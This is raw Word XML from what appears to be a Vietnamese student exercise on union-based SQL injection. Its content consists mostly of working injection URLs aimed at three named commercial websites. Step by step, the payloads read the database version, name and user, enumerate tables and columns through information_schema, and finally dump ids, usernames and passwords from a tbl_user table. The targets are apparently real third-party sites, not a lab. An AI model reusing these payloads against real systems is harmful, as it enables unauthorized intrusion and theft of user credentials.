            <wp:extent cx="3201889" cy="2000839"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20827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84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7693" cy="200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6E31" w14:textId="607014B8" w:rsidR="00357B66" w:rsidRDefault="00357B66" w:rsidP="00357B66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357B66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220  UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC427E9" w14:textId="2F8A777C" w:rsidR="00357B66" w:rsidRDefault="00357B66" w:rsidP="00357B66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357B66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6E16A96F" wp14:editId="5DAFF3F3">
            <wp:extent cx="3112534" cy="1945001"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="267820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2053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8796" cy="19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9F81" w14:textId="77777777" w:rsidR="00AB1984" w:rsidRDefault="00AB1984" w:rsidP="00AB1984">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FA254F" w14:textId="736AF7F8" w:rsidR="00AB1984" w:rsidRDefault="00AB1984" w:rsidP="00AB198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IV. Kiểm Tra Một Số Thông Tin Của Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04F935" w14:textId="55D82C9A" w:rsidR="00AB1984" w:rsidRDefault="00AB1984" w:rsidP="00AB1984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AB1984">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B131254" w14:textId="7551465B" w:rsidR="00AB1984" w:rsidRDefault="00AB1984" w:rsidP="00AB1984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AB1984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6C46809B" wp14:editId="56542661">
            <wp:extent cx="3007611" cy="1879435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="33744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405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1889" cy="188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CB90" w14:textId="06EC9A8B" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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406ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CFBE87" w14:textId="0BC35FE3" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00AB1984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406ACC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61424774" wp14:editId="3D9B4DE2">
            <wp:extent cx="3241164" cy="2025381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1646145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4549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7387" cy="202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B47D" w14:textId="31BDA79B" w:rsidR="00D05DCF" w:rsidRDefault="00D05DCF" w:rsidP="00D05DCF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D05DCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A3195" w14:textId="758B0D1D" w:rsidR="00D05DCF" w:rsidRDefault="00D05DCF" w:rsidP="00AB1984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D05DCF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728301A0" wp14:editId="32121E98">
            <wp:extent cx="3315072" cy="2071567"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="2109996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966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3995" cy="20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9957" w14:textId="11D7E242" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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AB1984">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED54CFD" w14:textId="687711CD" w:rsidR="00AB1984" w:rsidRDefault="00406ACC" w:rsidP="00AB1984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406ACC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3AF2E454" wp14:editId="7F904A25">
            <wp:extent cx="2979441" cy="1861832"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="156857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7441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5369" cy="18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D3B5" w14:textId="6A8C7A69" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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406ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.diencovothanhdat.com/?php=product_detail&amp;id=-30  UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE3741" w14:textId="3F1A53F6" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00AB1984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406ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7013CE05" wp14:editId="6212E643">
            <wp:extent cx="3038072" cy="1898470"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="291958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583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5036" cy="190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A240" w14:textId="1A8B309E" w:rsidR="00D05DCF" w:rsidRDefault="00D05DCF" w:rsidP="00D05DCF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D05DCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.diencovothanhdat.com/?php=product_detail&amp;id=-30  UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266610AF" w14:textId="64ADD1F9" w:rsidR="00406ACC" w:rsidRDefault="00D05DCF" w:rsidP="00D05DCF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D05DCF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7B5D22FB" wp14:editId="549F6487">
            <wp:extent cx="3058921" cy="1911498"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="120524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437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5777" cy="191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C12E" w14:textId="3FEA9BC1" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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406ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220  UNION SELECT 1,2,3,4,5,@@version,7,8,9,10,11,12,13,14,15,16,17,18 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F485E9D" w14:textId="745577A6" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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406ACC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03E85540" wp14:editId="4AB3F1F1">
            <wp:extent cx="3465034" cy="2165276"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1266693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9394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3767" cy="217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01FA" w14:textId="29D0877D" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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406ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220  UNION SELECT 1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2DEFA4" w14:textId="406E79A5" w:rsidR="00406ACC" w:rsidRDefault="00406ACC" w:rsidP="00406ACC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406ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693D7EF6" wp14:editId="30D6167E">
            <wp:extent cx="3437191" cy="2149345"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="971127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2725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5544" cy="215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480E" w14:textId="40D76E1D" w:rsidR="00D05DCF" w:rsidRDefault="00D05DCF" w:rsidP="00D05DCF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D05DCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220  UNION SELECT 1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34953B40" w14:textId="2702BE93" w:rsidR="00D05DCF" w:rsidRDefault="00D05DCF" w:rsidP="00D05DCF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D05DCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F55D556" wp14:editId="567C3554">
            <wp:extent cx="3520589" cy="2199992"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1558146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466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8464" cy="22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19D4" w14:textId="77777777" w:rsidR="000D1F46" w:rsidRDefault="000D1F46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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453815C" w14:textId="60AF3499" w:rsidR="000D1F46" w:rsidRDefault="000D1F46" w:rsidP="000D1F46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.LIỆT KÊ CÁC BẢNG TRONG DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C3B02" w14:textId="3E6C5EDF" w:rsidR="000D1F46" w:rsidRPr="000D1F46" w:rsidRDefault="000D1F46" w:rsidP="000D1F46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6E44F" w14:textId="44FB3542" w:rsidR="000D1F46" w:rsidRDefault="000D1F46" w:rsidP="000D1F46">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743703D5" wp14:editId="6169A366">
            <wp:extent cx="3560799" cy="2225119"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="449312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287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2866" cy="222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7B98" w14:textId="3C82A44E" w:rsidR="000D1F46" w:rsidRPr="000D1F46" w:rsidRDefault="000D1F46" w:rsidP="000D1F46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.diencovothanhdat.com/?php=product_detail&amp;id=-30  UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11711324" w14:textId="4A7B20E1" w:rsidR="000D1F46" w:rsidRPr="000D1F46" w:rsidRDefault="000D1F46" w:rsidP="000D1F46">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A93BB1" wp14:editId="69D8A56C">
            <wp:extent cx="3610496" cy="2256175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="718187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8784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0093" cy="22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79FF" w14:textId="2A5FBE31" w:rsidR="000D1F46" w:rsidRDefault="000D1F46" w:rsidP="000D1F46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0D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220  UNION SELECT 1,2,3,4,5,unhex(hex(group_concat(table_name))),7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2E9F6" w14:textId="56CAA271" w:rsidR="000D1F46" w:rsidRPr="007D26F0" w:rsidRDefault="000D1F46" w:rsidP="00D05DCF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C6BCBE" wp14:editId="6E5A81D8">
            <wp:extent cx="3718659" cy="2323765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="66500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068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2804" cy="23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FB34" w14:textId="524A766B" w:rsidR="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="007D26F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VI</w:t>
      </w:r>
      <w:r w:rsidRPr="007D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. LIỆT KÊ CÁC CỘT TRONG TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA69F3" w14:textId="1807B4DB" w:rsidR="007D26F0" w:rsidRPr="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="007D26F0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7D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where table_name=0x74626c5f75736572--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DB9E1" w14:textId="508491B3" w:rsidR="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="00D05DCF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7D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D66749" wp14:editId="7D552603">
            <wp:extent cx="3898859" cy="2436370"/>
            <wp:effectExtent l="0" t="0" r="6985" b="2540"/>
            <wp:docPr id="139106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669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4069" cy="243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7692" w14:textId="6D75E3A7" w:rsidR="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="007D26F0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7D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.diencovothanhdat.com/?php=product_detail&amp;id=-30  UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x74626c5f75736572--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE44B0" w14:textId="287BD996" w:rsidR="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="00D05DCF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7D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325710FB" wp14:editId="3EAF2263">
            <wp:extent cx="3767805" cy="2354476"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="1762600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0074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3060" cy="23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03B4" w14:textId="77777777" w:rsidR="007D26F0" w:rsidRPr="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="007D26F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LẤY DỮ LIỆU TRONG BẢNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954C343" w14:textId="6DB6B70A" w:rsidR="007D26F0" w:rsidRDefault="007D26F0" w:rsidP="007D26F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://www.tapiocafeedfood.com/?php=product_detail&amp;id=-295  UNION SELECT 1,2,unhex(hex(group_concat(id,uid,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from tbl_user --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152EFC7D" w14:textId="19273C50" w:rsidR="007D26F0" w:rsidRPr="00D05DCF" w:rsidRDefault="007D26F0" w:rsidP="00D05DCF">
      <w:pPr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r w:rsidRPr="007D26F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114198B7" wp14:editId="331F37D6">
            <wp:extent cx="4435522" cy="2771727"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="199197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711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9471" cy="27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26F0" w:rsidRPr="00D05DCF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8E09AD" w14:textId="77777777" w:rsidR="00EE6B6E" w:rsidRDefault="00EE6B6E" w:rsidP="008C5B17">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="129D32AF" w14:textId="77777777" w:rsidR="00EE6B6E" w:rsidRDefault="00EE6B6E" w:rsidP="008C5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315DE9" w14:textId="77777777" w:rsidR="00EE6B6E" w:rsidRDefault="00EE6B6E" w:rsidP="008C5B17">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3BD1AD2B" w14:textId="77777777" w:rsidR="00EE6B6E" w:rsidRDefault="00EE6B6E" w:rsidP="008C5B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43137A" w14:textId="4E105961" w:rsidR="008C5B17" w:rsidRPr="008C5B17" w:rsidRDefault="008C5B17">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="008C5B17">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>Cao</w:t>
    </w:r>
    <w:r w:rsidRPr="008C5B17">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN"/>
      </w:rPr>
      <w:t xml:space="preserve"> Thị Ngọc Phụng</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="472035DF" w14:textId="2FEBA5B8" w:rsidR="008C5B17" w:rsidRPr="008C5B17" w:rsidRDefault="008C5B17">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="008C5B17">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="vi-VN"/>
      </w:rPr>
      <w:t>21110276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B17"/>
    <w:rsid w:val="00004971"/>
    <w:rsid w:val="000D1F46"/>
    <w:rsid w:val="00155D39"/>
    <w:rsid w:val="001C30F5"/>
    <w:rsid w:val="002A1FD5"/>
    <w:rsid w:val="00357B66"/>
    <w:rsid w:val="00382552"/>
    <w:rsid w:val="00406ACC"/>
    <w:rsid w:val="00510554"/>
    <w:rsid w:val="007D26F0"/>
    <w:rsid w:val="008528DE"/>
    <w:rsid w:val="008C5B17"/>
    <w:rsid w:val="008D4EB2"/>
    <w:rsid w:val="009334B5"/>
    <w:rsid w:val="009A4AC0"/>
    <w:rsid w:val="00AB1984"/>
    <w:rsid w:val="00B82B60"/>
    <w:rsid w:val="00C000F1"/>
    <w:rsid w:val="00D05DCF"/>
    <w:rsid w:val="00EE6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BA565"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{341B16ED-B23C-44E3-BEA4-7F38BBEED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6ACC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008C5B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B1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C5B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5B17"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
